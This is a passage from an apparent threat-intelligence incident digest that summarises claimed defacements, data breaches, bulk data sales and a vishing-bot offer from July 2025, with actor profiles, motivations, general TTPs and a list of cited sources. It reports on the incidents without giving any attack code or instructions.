  • Date: 2025-07-02T08:07:12Z
  • Victim: PT Global Multi Sentosa (International Trade & Development, Indonesia)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: The “GARUDA ERROR SYSTEM” group claims to have defaced the website of PT Global Multi Sentosa, an international trade and development company in Indonesia. A mirror link to the defaced page was provided. Website defacement is a common hacktivist tactic used to publicly announce a breach, convey a message, or simply demonstrate their capabilities.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • “GARUDA ERROR SYSTEM” is highly likely an alias or closely affiliated with the Indonesian hacktivist group “Hacktivist of Garuda”.17
  • History & Profile: “Hacktivist of Garuda” is an Indonesian hacktivist group that created a Telegram channel to announce cyberattacks targeting Indian entities, explicitly stating their attacks were a counterattack in retaliation for attacks by Indian hackers.17 They have previously claimed data theft from Indian railways and multiple Indian educational institutions.
  • Motivations: The primary motivation for “GARUDA ERROR SYSTEM” is hacktivism and retaliation within an ongoing cyber conflict between Indonesian and Indian hacktivist groups.17 While their primary targets are Indian, defacing an Indonesian company’s website could be a false flag operation, a demonstration of capability for potential clients, or a message related to internal Indonesian affairs.
  • Key TTPs: Their activities include data theft and defacement of websites.17 The defacement of PT Global Multi Sentosa’s website is consistent with their known tactics.
  • Source Links:

40. Alleged sale of a press 1 bot

  • Incident Overview:
  • Category: Alert
  • Date: 2025-07-02T07:26:34Z
  • Victim: Users of Coinbase, Kraken, Gemini, and other crypto platforms (USA)
  • Threat Actor: min0r
  • Incident Description: The threat actor “min0r” is reportedly running a “Press 1 (P1) bot” all week, specifically targeting users of major cryptocurrency platforms such as Coinbase, Kraken, and Gemini. The bot uses custom scripts and spoofed calls for vishing (voice phishing) attacks. This tool automates sophisticated social engineering, enabling attackers to trick victims into revealing sensitive information (e.g., login credentials, MFA codes) or performing actions that compromise their crypto accounts, posing a direct threat to cryptocurrency holders.
  • Threat Actor Profile: min0r
  • No specific information about “min0r” is available in the provided research material. This suggests that “min0r” is either a new or less publicly documented individual threat actor specializing in developing and operating vishing tools.
  • Motivations: The explicit “sale” of a P1 bot indicates that the primary motivation is financial gain, by providing a tool that enables other cybercriminals to conduct large-scale vishing attacks for cryptocurrency theft.
  • TTPs: This actor specializes in developing and operating automated vishing tools. The “Press 1 bot” leverages spoofed calls and custom scripts to simulate legitimate interactions, tricking victims into engaging with the automated system. This technique is highly effective at bypassing traditional email or SMS-based phishing defenses, as it directly exploits human trust and urgency over the phone. The targeting of cryptocurrency users suggests a focus on high-value financial targets.
  • Source Links:

41. Alleged data breach of Directorate of Immigration Administration

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T06:19:42Z
  • Victim: Turkish Directorate General of Migration Management (YÖKİM) (Government Administration, Turkey)
  • Threat Actor: Turk_data
  • Incident Description: The threat actor “Turk_data” claims to be selling a database allegedly stolen from the Turkish Directorate General of Migration Management (YÖKİM). The leak reportedly includes personally identifiable information (PII) such as Foreigner IDs, full names, birth dates, places of birth, spouse and parent names, and full residential addresses of migrants who entered Turkey between 2018 and 2024. This is a highly sensitive breach of government data, with severe implications for the privacy and security of a large number of individuals, potentially enabling identity fraud, targeted harassment, or other forms of exploitation.
  • Threat Actor Profile: Turk_data
  • The alias “Turk_data” directly suggests a focus on Turkish data. While specific details about “Turk_data” as a distinct threat actor are limited in the provided snippets, the term “TURK data” appears in contexts related to FBI time and attendance systems, and discussions about data quality and reciprocity among cybercriminals.31 These references do not directly profile “Turk_data” as a hacking group but indicate the sensitivity and potential misuse of such data.
  • Motivations: The explicit “sale” of the database clearly indicates that the primary motivation is financial gain. The highly sensitive nature of migration data, which includes extensive PII, makes it extremely valuable on underground markets for various illicit purposes.
  • TTPs: The successful breach of a government entity like the Directorate General of Migration Management suggests sophisticated attack methods. These could include exploiting vulnerabilities in government systems, targeted social engineering campaigns against employees, or the use of malware to exfiltrate large volumes of sensitive data. The specific timeframe (2018-2024) indicates a persistent or recent compromise that allowed for the collection of a comprehensive dataset.
  • Source Links:

42. Alleged data leak of Business Mens in Romania

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T06:09:43Z
  • Victim: Business professionals in Romania (Romania)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to have 40,000 data records of business professionals in Romania. The compromised data reportedly consists of names, roles, and email addresses. This type of business contact data is highly valuable for targeted phishing campaigns, business email compromise (BEC) scams, and other forms of corporate fraud, enabling attackers to impersonate legitimate contacts or launch highly personalized attacks.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. This suggests that “stepbro” is either a new or less publicly documented individual threat actor. However, “stepbro” is associated with multiple data leak incidents in this report (Incidents 42, 43, 44, 45, 46), indicating a prolific data broker or an actor specializing in large-scale data acquisition and sale.
  • Motivations: The explicit “sale” of data in this and other incidents clearly indicates that the primary motivation is financial gain. The actor appears to specialize in acquiring and monetizing various types of bulk data.
  • TTPs: While specific TTPs are unknown, the acquisition of 40,000 business records suggests either a breach of a business directory, a professional networking platform, or a large-scale data scraping operation. The consistent volume of data across multiple “stepbro” incidents points to automated or highly efficient data collection methods.
  • Source Links:

43. Keymous+ claims to have targeted multiple websites

  • Incident Overview:
  • Category: Alert
  • Date: 2025-07-02T05:47:14Z
  • Victim: Microsoft, Roblox, Netflix, Bank of America, Xbox, Dead by Daylight, Rainbow Six, Ubisoft, Forza, Threads, Sea of Thieves, World War Z, Hulu, Steam (USA – Software Development, Gaming, Financial Services, Social Media, Entertainment)
  • Threat Actor: Keymous+
  • Incident Description: The “Keymous+” group claims responsibility for cyberattacks targeting major platforms including Microsoft, Roblox, Netflix, and Bank of America, stating they were recently active against these platforms. The post also notes observed outages across services like Xbox, Dead by Daylight, Rainbow Six, Ubisoft, Forza, Threads, Sea of Thieves, World War Z, Hulu, and Steam, but explicitly denies involvement in attacks on those specific platforms. This public claim, while partially disclaiming responsibility for some outages, serves to assert their presence and impact on high-profile targets.
  • Threat Actor Profile: Keymous+
  • “Keymous+” is identified as a pro-Iranian hacktivist group.35 This group is part of a broader trend of hacktivism in the Middle East, where groups frequently engage in cyber warfare as a form of activism.35 “Keymous+” is also listed among the top hacktivist groups by U.S. cybersecurity agencies, along with Mr Hamza, Mysterious Team, and GARUDA_ERROR_SYSTEM.36
  • History & Profile: “Keymous+” and similar hacktivist crews have been recorded conducting attacks against U.S. Air Force domains, major aerospace and defense companies, and financial institutions, particularly in the aftermath of Iranian nuclear site bombings in June.35 There is a trend of smaller hacktivist groups coming together to form larger entities like the Cyber Islamic Resistance or United Cyber Front for Palestine and Iran.35
  • Motivations: The primary motivation for “Keymous+” appears to be hacktivism and ideological alignment, particularly in support of pro-Iranian, anti-U.S., and anti-Saudi messaging.35 Their activities are characterized as strategic, ideological, and psychological operations aimed at disrupting public trust and signaling technical superiority, rather than solely financial gain.35 The targeting of major U.S. technology and financial entities aligns with these geopolitical and ideological objectives.
  • Key TTPs: While specific TTPs for this incident are not detailed, their past activities indicate Distributed Denial-of-Service (DDoS) attacks.35 They often exploit targets of opportunity based on unpatched or outdated software with known Common Vulnerabilities and Exposures (CVEs), or the use of default or common passwords on internet-connected accounts and devices.36 Their public claims on Telegram serve as a form of information operation, amplifying their perceived impact.35
  • Source Links:

44. Alleged sale of 272K Farmers data in Uganda

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:45:02Z
  • Victim: Farmers in Uganda (Agriculture & Farming, Uganda)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to be selling data pertaining to 272,000 farmers in Uganda. While the specific data fields are not detailed, such a large dataset of individuals involved in agriculture could be used for targeted scams, social engineering attacks, or other forms of fraud, particularly in regions where digital literacy might be lower.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. This suggests that “stepbro” is either a new or less publicly documented individual threat actor. As noted in Incident 42, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the data clearly indicates that the primary motivation is financial gain. The actor aims to profit from the unauthorized acquisition and distribution of bulk personal data.
  • TTPs: While specific TTPs are unknown, the acquisition of 272,000 records suggests a large-scale data collection operation. This could involve breaching databases of agricultural organizations, government agencies, or commercial entities that collect farmer data, or it could be the result of extensive data scraping or compilation from various sources.
  • Source Links:

45. Alleged Sale of Portuguese Business Owner Data

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:42:19Z
  • Victim: Portuguese business owners (Portugal)
  • Threat Actor: stepbro
  • Incident Description: A threat actor, “stepbro,” is offering to sell a database allegedly containing information on 55,000 Portuguese business owners. The dataset reportedly includes business names, addresses, phone numbers, email addresses, company websites, and industry classifications. This type of data is highly valuable for business-to-business (B2B) phishing, targeted marketing scams, competitive intelligence gathering, or even corporate espionage.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. As noted in previous incidents, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the data clearly indicates that the primary motivation is financial gain. The actor aims to profit from the unauthorized acquisition and distribution of bulk business contact information.
  • TTPs: While specific TTPs are unknown, the acquisition of 55,000 business owner records suggests a large-scale data collection operation. This could involve breaching databases of business registries, industry associations, or commercial data providers, or it could be the result of extensive data scraping from public sources. The consistent volume of data across multiple “stepbro” incidents points to automated or highly efficient data collection methods.
  • Source Links:

46. Alleged sale of Worldwide Hotels Info Leads

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:25:35Z
  • Victim: 168,000 hotels worldwide (Hospitality & Tourism)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to be selling a database containing information on 168,000 hotels worldwide. The listing includes detailed hotel lead data such as hotel names, star ratings, addresses, phone numbers, city names, geographic coordinates (latitude and longitude), and in some cases, additional identifiers. Most of the listed hotels appear to be located in Turkey, including well-known regions like Marmaris, Alanya, Antalya, and Istanbul. This data can be valuable for targeted phishing campaigns against hotel staff, reservation fraud, or for competitive intelligence in the hospitality sector.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. As noted in previous incidents, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the data clearly indicates that the primary motivation is financial gain. The actor aims to profit from the unauthorized acquisition and distribution of bulk business contact information.
  • TTPs: While specific TTPs are unknown, the acquisition of 168,000 hotel records suggests a large-scale data collection operation. This could involve breaching databases of hotel booking platforms, hospitality industry directories, or travel agencies, or it could be the result of extensive data scraping from public sources. The concentration in Turkey might indicate a specific compromise of a Turkish-based service or a targeted scraping effort in that region.
  • Source Links:

47. Alleged data leak of customer database from Hong Kong-based shopping website

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:15:07Z
  • Victim: Hong Kong-based shopping website (E-commerce & Online Stores, China)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to be selling a customer database allegedly extracted from a Hong Kong-based shopping website. The leaked dataset reportedly includes detailed personally identifiable information (PII) such as full names, birthdates, phone numbers, physical addresses, email addresses, hashed passwords, and user login credentials. Additional fields include purchase activity, customer status, and platform usage indicators. This comprehensive PII leak poses a significant risk for identity theft, account takeover, targeted phishing, and various forms of financial fraud against the customers of the e-commerce site.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. As noted in previous incidents, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the customer database clearly indicates that the primary motivation is financial gain. The comprehensive nature of the PII, including hashed passwords and purchase activity, makes this dataset highly valuable for various illicit activities.
  • TTPs: While specific TTPs are unknown, the acquisition of such a detailed customer database from an e-commerce website suggests a successful breach of the website’s backend systems. This could involve exploiting web application vulnerabilities (e.g., SQL injection, insecure APIs), compromising administrative credentials, or leveraging misconfigurations in the database or server. The inclusion of hashed passwords indicates a direct compromise of user authentication data.
  • Source Links:

48. Alleged Data Breach of Olenguruone Sub-County Hospital

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T04:44:51Z
  • Victim: Olenguruone Sub-County Hospital (Hospital & Health Care, Kenya)
  • Threat Actor: kanie2903
  • Incident Description: A threat actor, “kanie2903,” claims to have leaked a database allegedly stolen from Olenguruone Sub-County Hospital in Kenya. While the specific contents of the database are not detailed, a data breach of a hospital is highly concerning due to the sensitive nature of patient health information (PHI) and personally identifiable information (PII) typically held by such institutions. This could lead to medical identity theft, targeted scams, or blackmail.
  • Threat Actor Profile: kanie2903
  • No specific information about “kanie2903” is available in the provided research material. As noted in Incident 4, “kanie2903” is likely a new or less publicly documented individual threat actor.
  • Motivations: Given the nature of the target (a hospital) and the typical monetization of such data, the primary motivation is highly likely financial gain through the sale of compromised patient or administrative data.
  • TTPs: While specific TTPs are unknown, the breach of a hospital database suggests common methods such as exploiting vulnerabilities in healthcare management systems, weak network perimeter defenses, or compromised credentials obtained through phishing. The targeting of a healthcare entity aligns with a broader trend of cybercriminals seeking high-value, sensitive data.
  • Source Links:

49. Alleged Data Breach of Anka Consulting Firm

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T04:35:28Z
  • Victim: Anka Consulting (Accounting, USA)
  • Threat Actor: flirt
  • Incident Description: A threat actor named “flirt” claims to have breached Anka Consulting, an accounting firm in the USA, exposing data from over 270 clients and leaking 1,069 sensitive documents. The compromised files reportedly include bank statements, W-9 forms, tax records, and a CSV client list with names, preparers, reviewers, and status details. This is a highly critical breach for an accounting firm, as it involves extensive financial and tax-related PII, posing severe risks of financial fraud, identity theft, and regulatory non-compliance for both the firm and its clients.
  • Threat Actor Profile: flirt
  • No specific information about “flirt” is available in the provided research material. This suggests that “flirt” is either a new or less publicly documented individual threat actor.
  • Motivations: The nature of the leaked data (financial documents, tax records, client lists) strongly indicates that the primary motivation is financial gain. This data is highly valuable for various forms of financial fraud, including tax fraud, loan fraud, and business email compromise (BEC).
  • TTPs: The exfiltration of over 1,000 sensitive documents and data from 270 clients suggests a deep compromise of Anka Consulting’s internal systems, likely involving access to document management systems or file servers. This could be achieved through network intrusion, exploitation of vulnerabilities in client portals, or successful social engineering attacks leading to credential compromise.
  • Source Links:

50. Liwaa Muhammad targets the website of Progressive Media Net

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T04:27:03Z
  • Victim: Progressive Media Net (Marketing, Advertising & Sales, India)
  • Threat Actor: Liwaa Muhammad
  • Incident Description: The “Liwaa Muhammad” group claims to have defaced the website of Progressive Media Net, an Indian marketing, advertising, and sales company. A mirror link to the defaced page was provided. Website defacement is a common tactic used by hacktivist groups to publicly announce a breach, convey a political or ideological message, or simply demonstrate their capabilities.
  • Threat Actor Profile: Liwaa Muhammad
  • No specific information about “Liwaa Muhammad” is available in the provided research material. This suggests that “Liwaa Muhammad” is either a new or less publicly documented individual threat actor or group. The name “Liwaa Muhammad” has an Arabic connotation (“Banner of Muhammad”), suggesting a potential religiously or ideologically motivated group, possibly with ties to the Middle East.
  • Motivations: Given the nature of the attack (defacement) and the group’s name, the primary motivation is likely hacktivism, aiming to make a public statement or demonstrate capability. The repeated targeting of Indian entities (as seen in subsequent incidents) suggests a focused campaign, potentially related to geopolitical or ideological grievances.
  • TTPs: Defacement typically involves exploiting vulnerabilities in web applications (e.g., CMS vulnerabilities), gaining unauthorized access to web server directories, or exploiting misconfigurations. The consistent defacement of multiple Indian websites suggests a systematic approach to identifying and compromising targets.
  • Source Links:

Works cited

  1. Scattered Spider Threat Actor Profile – Quorum Cyber, accessed July 2, 2025, https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/
  2. Scattered Spider: Threat Actor Profile – Cyble, accessed July 2, 2025, https://cyble.com/threat-actor-profiles/scattered-spider/
  3. Hellcat Hacking Group Unmasked: Investigating Rey and Pryx …, accessed July 2, 2025, https://www.kelacyber.com/blog/hellcat-hacking-group-unmasked-rey-and-pryx/
  4. Six Hackers in the United States and Abroad Charged for Crimes Affecting Over One Million Victims – FBI, accessed July 2, 2025, https://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims
  5. LulzSec – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/LulzSec
  6. DragonForce ransomware variant tied to emerging DEVMAN threat …, accessed July 2, 2025, https://www.scmagazine.com/news/dragonforce-ransomware-variant-tied-to-emerging-devman-threat-actor
  7. New SideWinder Cyber Attacks Target Maritime Facilities in Multiple Countries, accessed July 2, 2025, https://thehackernews.com/2024/07/new-sidewinder-cyber-attacks-target.html
  8. The Underground Economist: Volume 5, Issue 11 | ZeroFox, accessed July 2, 2025, https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-11/
  9. Flash Report: U.S. Property Data Advertised for Sale on Dark Web …, accessed July 2, 2025, https://www.zerofox.com/intelligence/flash-report-u-s-property-data-advertised-for-sale-on-dark-web-forum/
  10. AHA! is Austin Hackers Anonymous, accessed July 2, 2025, https://takeonme.org/
  11. Derp (hacker group) – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Derp_(hacker_group)
  12. GIFTEDCROOK Malware Evolves: From Browser Stealer to Intelligence-Gathering Tool, accessed July 2, 2025, https://thehackernews.com/2025/06/giftedcrook-malware-evolves-from.html
  13. Threat Actor – MISP galaxy, accessed July 2, 2025, https://misp-galaxy.org/threat-actor/
  14. Security Program Controls/Technologies | SC Media, accessed July 2, 2025, https://www.scworld.com/topic/security-program-controlstechnologies/87
  15. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 2, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
  16. Ghost ransomware actors compromised victims in more than 70 countries | SC Media, accessed July 2, 2025, https://www.scworld.com/news/fbi-cisa-say-ghost-ransomware-actors-compromised-victims-in-more-than-70-countries
  17. Cyberwarfare: Indian Cyber Mafia Targeting Indonesia Triggers …, accessed July 2, 2025, https://thecyberexpress.com/indian-cyber-mafia-targeting-indonesia/
  18. World Leaks: An Extortion Platform – Lexfo’s security blog, accessed July 2, 2025, https://blog.lexfo.fr/world-leaks-an-extortion-platform.html
  19. Ali Baba and the Forty Thieves – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Ali_Baba_and_the_Forty_Thieves
  20. Iran-Linked BladedFeline Hits Iraqi and Kurdish Targets with …, accessed July 2, 2025, https://thehackernews.com/2025/06/iran-linked-bladedfeline-hits-iraqi-and.html
  21. Inside the Shadows: Understanding Active Iranian APT Groups – Picus Security, accessed July 2, 2025, https://www.picussecurity.com/resource/blog/understanding-active-iranian-apt-groups
  22. Darknet market – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Darknet_market
  23. Europe-wide takedown hits longest-standing dark web drug market …, accessed July 2, 2025, https://www.europol.europa.eu/media-press/newsroom/news/europe-wide-takedown-hits-longest-standing-dark-web-drug-market
  24. The Islamic Revolutionary Guard Corps (IRGC) – Council on Foreign Relations, accessed July 2, 2025, https://www.cfr.org/backgrounder/irans-revolutionary-guards
  25. Iranian APT35 Hackers Targeting Israeli Tech Experts with AI-Powered Phishing Attacks, accessed July 2, 2025, https://thehackernews.com/2025/06/iranian-apt35-hackers-targeting-israeli.html
  26. List of hacker groups – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/List_of_hacker_groups
  27. Lapsus$ – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Lapsus$
  28. Lapsus$ | Bugcrowd, accessed July 2, 2025, https://www.bugcrowd.com/glossary/lapsus/
  29. Disrupting Handala: Did OP Innovate Help Silence a Major Cyber Threat?, accessed July 2, 2025, https://op-c.net/blog/did-op-innovate-disrupt-handala-cyber-threat/
  30. Iranian hacker group targets Israeli kindergartens’ PA systems | Iran International, accessed July 2, 2025, https://www.iranintl.com/en/202501265679
  31. Audit of the Federal Bureau of Investigation’s Cyber Threat, accessed July 2, 2025, https://nsarchive.gwu.edu/sites/default/files/documents/3002264/Document-08.pdf
  32. Honor Among Crooks: The Role of Trust in Obfuscated Disreputable, accessed July 2, 2025, https://repository.arizona.edu/bitstream/handle/10150/672370/preprint_honoramongcrooks.pdf?sequence=1&isAllowed=y
  33. Privacy Impact Assessment WebTA – FBI, accessed July 2, 2025, https://www.fbi.gov/how-we-can-help-you/more-fbi-services-and-information/freedom-of-information-privacy-act/department-of-justice-fbi-privacy-impact-assessments/webta
  34. Digital Frontier Research Articles – R Discovery, accessed July 2, 2025, https://discovery.researcher.life/topic/digital-frontier/9220208?page=1&topic_name=Digital%20Frontier
  35. Pro-Iranian Hacktivist Group Leaks Personal Records from the 2024 Saudi Games, accessed July 2, 2025, https://thehackernews.com/2025/06/pro-iranian-hacktivist-group-leaks.html
  36. U.S. Agencies Warn of Rising Iranian Cyber Attacks on Defense, OT Networks, and Critical Infrastructure – The Hacker News, accessed July 2, 2025, https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
  37. Dragonfly: Western energy sector targeted by sophisticated attack …, accessed July 2, 2025, https://www.security.com/threat-intelligence/dragonfly-energy-sector-cyber-attacks
  38. Attack Surface Analysis of the Digital Twin and Advanced Sensor and Instrumentation Interfaces – INL Digital Library – Idaho National Laboratory, accessed July 2, 2025, https://inldigitallibrary.inl.gov/sites/sti/sti/Sort_74726.pdf

Related Posts